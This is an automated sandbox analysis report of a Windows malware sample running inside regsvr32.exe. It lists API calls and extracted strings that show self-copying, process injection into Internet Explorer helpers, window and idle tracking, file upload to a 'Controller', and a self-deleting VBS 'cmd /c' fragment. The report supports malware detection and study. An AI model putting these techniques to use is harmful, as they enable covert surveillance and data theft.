                                      • Opcode Fuzzy Hash: 5a46f387758b422e82a29643042ffddd8f3090459553bf290a9198c8d49a521d
                                      • Instruction Fuzzy Hash: E5413F72544319BAE210DA51DD86FBB7FECEB85F50F40081AFA44D6080DBA4E909DBB3
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\regsvr32.exe,00000001,02A0764D,C:\Windows\SysWOW64\regsvr32.exe,00000003,02A07675,02A752D8,02A076CE), ref: 02A07284
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A0728D
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02A072A2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072A5
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02A072B6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072B9
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02A072CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072CD
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02A072DE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072E1
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02A072F2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A072F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                      • API String ID: 1646373207-1248235463
                                      • Opcode ID: 97a603a815906f2f68503a69bb67f176e847bcfbd8e5f82e28fbf170c8a7ca99
                                      • Instruction ID: 00f12cf8c16032772f07578a2f32b92cd154b774c13e25058b0aec4c6d73241f
                                      • Opcode Fuzzy Hash: 97a603a815906f2f68503a69bb67f176e847bcfbd8e5f82e28fbf170c8a7ca99
                                      • Instruction Fuzzy Hash: 4C0175E0E8031676BB216B3A6C98D1BEF9CAE587513094C27B805D3141EFBCD415CE64
                                      APIs
                                      • _wcslen.LIBCMT ref: 02A0CE07
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,02A750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 02A0CE20
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\regsvr32.exe,00000000,00000000,00000000,00000000,00000000,?,02A750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 02A0CED0
                                      • _wcslen.LIBCMT ref: 02A0CEE6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 02A0CF6E
                                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\regsvr32.exe,00000000,00000000), ref: 02A0CF84
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02A0CFC3
                                      • _wcslen.LIBCMT ref: 02A0CFC6
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02A0CFDD
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A750E4,0000000E), ref: 02A0D02D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000001), ref: 02A0D04B
                                      • ExitProcess.KERNEL32 ref: 02A0D062
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                      • String ID: 6$C:\Windows\SysWOW64\regsvr32.exe$del$open
                                      • API String ID: 1579085052-666830377
                                      • Opcode ID: 1bfd2ddb55df872a89b85894abbcfb491777827a701efdd896cc6b7d47967306
                                      • Instruction ID: da3c77ccb68469b85b225bce02477b2b7f9227b1a464ef0ce28c844109a1428b
                                      • Opcode Fuzzy Hash: 1bfd2ddb55df872a89b85894abbcfb491777827a701efdd896cc6b7d47967306
                                      • Instruction Fuzzy Hash: C451B1216883016BE609B764BDD0FBFA79FAF94B25F40041FF60E861C1EF549D058AA6
                                      APIs
                                      • lstrlenW.KERNEL32(?), ref: 02A1C036
                                      • _memcmp.LIBVCRUNTIME ref: 02A1C04E
                                      • lstrlenW.KERNEL32(?), ref: 02A1C067
                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02A1C0A2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02A1C0B5
                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02A1C0F9
                                      • lstrcmpW.KERNEL32(?,?), ref: 02A1C114
                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02A1C12C
                                      • _wcslen.LIBCMT ref: 02A1C13B
                                      • FindVolumeClose.KERNEL32(?), ref: 02A1C15B
                                      • GetLastError.KERNEL32 ref: 02A1C173
                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02A1C1A0
                                      • lstrcatW.KERNEL32(?,?), ref: 02A1C1B9
                                      • lstrcpyW.KERNEL32(?,?), ref: 02A1C1C8
                                      • GetLastError.KERNEL32 ref: 02A1C1D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                      • String ID: ?
                                      • API String ID: 3941738427-1684325040
                                      • Opcode ID: f34cc511b90b43f9c0a2db32b648ba7d6d1c07680ca802f74dc8856bb370ed6d
                                      • Instruction ID: f30ee38367bc950df9e4ac40d62ff6bbb4c769de7499d4d8a45fb77bd8fca969
                                      • Opcode Fuzzy Hash: f34cc511b90b43f9c0a2db32b648ba7d6d1c07680ca802f74dc8856bb370ed6d
                                      • Instruction Fuzzy Hash: 4341AE71984316ABDB20DF60D888AABB7EDBB59764F00092AF581C2160EF70C55CCBD2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: 9e2e220bd868e95ad1f5ba1c5aafda52d8b446ea6e74679a10ea3a7f7b318215
                                      • Instruction ID: ba68d54f315b7a7bfaba0e33d6eca3dca7f499d7d8d461a74b72c1deaa1b1671
                                      • Opcode Fuzzy Hash: 9e2e220bd868e95ad1f5ba1c5aafda52d8b446ea6e74679a10ea3a7f7b318215
                                      • Instruction Fuzzy Hash: 5ED15872D40300AFEB34AF789DC0B6AB7A9EF81314F04556EE915EB680EF35D9018B95
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02A14DD5
                                      • LoadLibraryA.KERNEL32(?), ref: 02A14E17
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02A14E37
                                      • FreeLibrary.KERNEL32(00000000), ref: 02A14E3E
                                      • LoadLibraryA.KERNEL32(?), ref: 02A14E76
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02A14E88
                                      • FreeLibrary.KERNEL32(00000000), ref: 02A14E8F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02A14E9E
                                      • FreeLibrary.KERNEL32(00000000), ref: 02A14EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-744132762
                                      • Opcode ID: fbf3e9744024cbdf6af87c43047779b12cf5bae07b13d2221d543271738af9b1
                                      • Instruction ID: 164c58d64025c6b2326a1d0093a48eae2072c3e62cfc692529c747b67073d5e7
                                      • Opcode Fuzzy Hash: fbf3e9744024cbdf6af87c43047779b12cf5bae07b13d2221d543271738af9b1
                                      • Instruction Fuzzy Hash: 0431F5B1941315ABD320DB28DC88E9FB7DDAF88764F000A25E94897240DF34C9058FE6
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 02A1D5DA
                                      • GetCursorPos.USER32(?), ref: 02A1D5E9
                                      • SetForegroundWindow.USER32(?), ref: 02A1D5F2
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02A1D60C
                                      • Shell_NotifyIconA.SHELL32(00000002,02A74B48), ref: 02A1D65D
                                      • ExitProcess.KERNEL32 ref: 02A1D665
                                      • CreatePopupMenu.USER32 ref: 02A1D66B
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02A1D680
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: 059c75cc858d512896607cdb82b300bad2bd9e29962517927f49aa7ba42d8b26
                                      • Instruction ID: edd245d91e6cdd5987c79246dd63dd4594b1a0185dda50e8b3dbd599c9f73c70
                                      • Opcode Fuzzy Hash: 059c75cc858d512896607cdb82b300bad2bd9e29962517927f49aa7ba42d8b26
                                      • Instruction Fuzzy Hash: DC215A7589021AEFDB154FA4ED0DA6B3B39FB08365F000918F606990A0DF71DD22DB54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 97c212e11f89d124365e2fbfee323a6a6135155e826f1098384cffef70efe69f
                                      • Instruction ID: 82e450d46b00610f0b6407834d791282cfe29631a02547aa3353cb8f76a32739
                                      • Opcode Fuzzy Hash: 97c212e11f89d124365e2fbfee323a6a6135155e826f1098384cffef70efe69f
                                      • Instruction Fuzzy Hash: 10B1BD71D002059FDB10CF68C880BEEBBB9FF89705F44816AE998A7241DF75E941CB60
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 02A5130A
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A5051F
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50531
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50543
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50555
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50567
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A50579
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A5058B
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A5059D
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505AF
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505C1
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505D3
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505E5
                                        • Part of subcall function 02A50502: _free.LIBCMT ref: 02A505F7
                                      • _free.LIBCMT ref: 02A512FF
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A51321
                                      • _free.LIBCMT ref: 02A51336
                                      • _free.LIBCMT ref: 02A51341
                                      • _free.LIBCMT ref: 02A51363
                                      • _free.LIBCMT ref: 02A51376
                                      • _free.LIBCMT ref: 02A51384
                                      • _free.LIBCMT ref: 02A5138F
                                      • _free.LIBCMT ref: 02A513C7
                                      • _free.LIBCMT ref: 02A513CE
                                      • _free.LIBCMT ref: 02A513EB
                                      • _free.LIBCMT ref: 02A51403
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 19483a8df8079526b60ea3ad556a366fcfe4720d8ce28a856b9ee8f1c10dce2c
                                      • Instruction ID: eef0799514cc1893aad4c1c20d86c45b1b6b6e0ac92f8dabdcff002ada223f95
                                      • Opcode Fuzzy Hash: 19483a8df8079526b60ea3ad556a366fcfe4720d8ce28a856b9ee8f1c10dce2c
                                      • Instruction Fuzzy Hash: 93316731600310DAEF60AF39D984B6BB7EAEB41325F5489A9E868D6550DF70ED80CB60
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02A08CE3
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 02A08D1B
                                      • __aulldiv.LIBCMT ref: 02A08D4D
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02A08E70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02A08E8B
                                      • CloseHandle.KERNEL32(00000000), ref: 02A08F64
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 02A08FAE
                                      • CloseHandle.KERNEL32(00000000), ref: 02A08FFC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                      • API String ID: 3086580692-2596673759
                                      • Opcode ID: c036d57931545c842669e7e241752c4051f4a9fb66d826424c366455e99ccf80
                                      • Instruction ID: 1ef9b31379250f8cd9abe570c4eceeddd29af1c245a08cad95c333b592bf3a19
                                      • Opcode Fuzzy Hash: c036d57931545c842669e7e241752c4051f4a9fb66d826424c366455e99ccf80
                                      • Instruction Fuzzy Hash: 50B18D316883409FD314EB24EAD4AAFB7E6AF84350F40491EF58A862D0EF749909CF56
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32 ref: 02A1C6F5
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02A1C726
                                      • RegCloseKey.ADVAPI32(?), ref: 02A1C9BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                      • API String ID: 1332880857-3730529168
                                      • Opcode ID: 02bba64826fe4a40e84ae16f503a237ab2ff52c3cbde48a075bd2af31af13cae
                                      • Instruction ID: f242091db41ba5a8ad44e568f772b7f505d44502f6c1de49cf51da11b1b62e1d
                                      • Opcode Fuzzy Hash: 02bba64826fe4a40e84ae16f503a237ab2ff52c3cbde48a075bd2af31af13cae
                                      • Instruction Fuzzy Hash: 3661ED711482419AD725EB20E990EEFB3EABF94314F10496FE59A82190FF709D49CE92
                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 02A048E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02A04A00
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02A04A0E
                                      • WSAGetLastError.WS2_32 ref: 02A04A21
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-2151626615
                                      • Opcode ID: a734a8d9fc046d92c478478ba73aba1459621bd1289089ace012921428b2f7f2
                                      • Instruction ID: 22353b52881e271366c4a3611fc152dedb561530fbb63f5a05bff64a369d0f29
                                      • Opcode Fuzzy Hash: a734a8d9fc046d92c478478ba73aba1459621bd1289089ace012921428b2f7f2
                                      • Instruction Fuzzy Hash: 1941E564FC03027BA6147B7A9ADE93EBB67FB41350B800559D90206AC5EF119C24CFE3
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 20f9c6a7b4d154e1d419c74e8f8ea7c664c6e4349b38946461126bc31546b49f
                                      • Instruction ID: c2fa40dafcebbece24d6f09c64665691d0aa3f7dec291bc5b5267281d7998160
                                      • Opcode Fuzzy Hash: 20f9c6a7b4d154e1d419c74e8f8ea7c664c6e4349b38946461126bc31546b49f
                                      • Instruction Fuzzy Hash: 7CC15372E40214AFDB20DBA8CD82FEF77F9AB49700F544165FE05EB281DA709D418BA4
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02A12ACD
                                        • Part of subcall function 02A1B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02A0407C), ref: 02A1B99F
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A040F5,?,?,02A040F5,02A65E74), ref: 02A1857E
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A65E74,?,?,02A040F5,02A65E74), ref: 02A18587
                                      • Sleep.KERNEL32(0000000A,02A65E74), ref: 02A12C1F
                                      • Sleep.KERNEL32(0000000A,02A65E74,02A65E74), ref: 02A12CC1
                                      • Sleep.KERNEL32(0000000A,02A65E74,02A65E74,02A65E74), ref: 02A12D63
                                      • DeleteFileW.KERNEL32(00000000,02A65E74,02A65E74,02A65E74), ref: 02A12DC5
                                      • DeleteFileW.KERNEL32(00000000,02A65E74,02A65E74,02A65E74), ref: 02A12DFC
                                      • DeleteFileW.KERNEL32(00000000,02A65E74,02A65E74,02A65E74), ref: 02A12E38
                                      • Sleep.KERNEL32(000001F4,02A65E74,02A65E74,02A65E74), ref: 02A12E52
                                      • Sleep.KERNEL32(00000064), ref: 02A12E94
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "
                                      • API String ID: 1223786279-3856184850
                                      • Opcode ID: 4dacd0aaefdfc1e5164dedf002ece02f1cf8f11d1a51f60232ea38dcc16e0629
                                      • Instruction ID: c41de7164a073d953ea8701070058251d6dacb72054438ec82c609b6295bba81
                                      • Opcode Fuzzy Hash: 4dacd0aaefdfc1e5164dedf002ece02f1cf8f11d1a51f60232ea38dcc16e0629
                                      • Instruction Fuzzy Hash: 620210315883418AD329FB60E9D4BEFB3E6AF94354F504C2ED58A471D0EF709A4ACE52
                                      APIs
                                        • Part of subcall function 02A558A9: CreateFileW.KERNEL32(00000000,00000000,?,02A55C84,?,?,00000000,?,02A55C84,00000000,0000000C), ref: 02A558C6
                                      • GetLastError.KERNEL32 ref: 02A55CEF
                                      • __dosmaperr.LIBCMT ref: 02A55CF6
                                      • GetFileType.KERNEL32(00000000), ref: 02A55D02
                                      • GetLastError.KERNEL32 ref: 02A55D0C
                                      • __dosmaperr.LIBCMT ref: 02A55D15
                                      • CloseHandle.KERNEL32(00000000), ref: 02A55D35
                                      • CloseHandle.KERNEL32(?), ref: 02A55E7F
                                      • GetLastError.KERNEL32 ref: 02A55EB1
                                      • __dosmaperr.LIBCMT ref: 02A55EB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: 02a9d59b57c47b4d4687004fb0ae09e78f4b156d2c385bbfd14d87c3e5082216
                                      • Instruction ID: e2a9438285a2409cad6a9c219ebd6696eced6b58ed86ff7fa4c0dbda907fdb76
                                      • Opcode Fuzzy Hash: 02a9d59b57c47b4d4687004fb0ae09e78f4b156d2c385bbfd14d87c3e5082216
                                      • Instruction Fuzzy Hash: B9A11132E142689FDF199F68DC91BAF7BA1EB06324F184159EC119B290DF358822CB91
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,02A750E4,?,02A75338), ref: 02A0F48E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,02A75338), ref: 02A0F4B9
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02A0F4D5
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02A0F554
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,02A75338), ref: 02A0F563
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
                                      • CloseHandle.KERNEL32(00000000,?,02A75338), ref: 02A0F66E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                      • API String ID: 3756808967-1743721670
                                      • Opcode ID: add95248af5e8154acbd4dca437f8521a90ebafdbf2b86123043ad52456eb482
                                      • Instruction ID: 861ecd1dcad6edbfe2ef3d270e37596f2301e3f88ff8f56f1603fb97ad8f02e1
                                      • Opcode Fuzzy Hash: add95248af5e8154acbd4dca437f8521a90ebafdbf2b86123043ad52456eb482
                                      • Instruction Fuzzy Hash: BD713F305883419FD724EB60E9D49EEB7A6BF94354F40081EE58A931E1EF34A90ECF52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: 77e303b7381ec5caf79144a0857e50f78b0c32109c10a2f2d1bcbc91f696f612
                                      • Instruction ID: 7b10cc35c43ab6c528eaec4ab9b87329f82cbd5c6c72c7ac80836698f77ebe0f
                                      • Opcode Fuzzy Hash: 77e303b7381ec5caf79144a0857e50f78b0c32109c10a2f2d1bcbc91f696f612
                                      • Instruction Fuzzy Hash: 8051F7756493119FDB209B6CC944B3B77F4AF8CB79F08082DF88597290EF65C840C662
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02A0AD38
                                      • Sleep.KERNEL32(000001F4), ref: 02A0AD43
                                      • GetForegroundWindow.USER32 ref: 02A0AD49
                                      • GetWindowTextLengthW.USER32(00000000), ref: 02A0AD52
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 02A0AD86
                                      • Sleep.KERNEL32(000003E8), ref: 02A0AE54
                                        • Part of subcall function 02A0A636: SetEvent.KERNEL32(?,?,00000000,02A0B20A,00000000), ref: 02A0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: eb52c346e9685620d0252b8c8ae3d5b6dde0c74bf772bcdc75a104d01ebeeea0
                                      • Instruction ID: b15ee35ecd2030a0f20218456c1098d70f2934d588959ca88fee2c28b9e3771c
                                      • Opcode Fuzzy Hash: eb52c346e9685620d0252b8c8ae3d5b6dde0c74bf772bcdc75a104d01ebeeea0
                                      • Instruction Fuzzy Hash: AD51E3316843519BD314FB20FAD4BBF77ABAB88718F40092AF586861D1DF24D945CE92
                                      APIs
                                        • Part of subcall function 02A12850: TerminateProcess.KERNEL32(00000000,?,02A0D80F), ref: 02A12860
                                        • Part of subcall function 02A12850: WaitForSingleObject.KERNEL32(000000FF,?,02A0D80F), ref: 02A12873
                                        • Part of subcall function 02A136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 02A13714
                                        • Part of subcall function 02A136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 02A1372D
                                        • Part of subcall function 02A136F8: RegCloseKey.ADVAPI32(?), ref: 02A13738
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02A0D859
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000000), ref: 02A0D9B8
                                      • ExitProcess.KERNEL32 ref: 02A0D9C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                      • API String ID: 1913171305-2411266221
                                      • Opcode ID: 03eb00c68c4676221b762e414ffdb26305d2cd82e3188910f49af11dab5c90ab
                                      • Instruction ID: e322bd114087a910609f0877b090eac44d8aa9d80986ef81c667b989bbf0e379
                                      • Opcode Fuzzy Hash: 03eb00c68c4676221b762e414ffdb26305d2cd82e3188910f49af11dab5c90ab
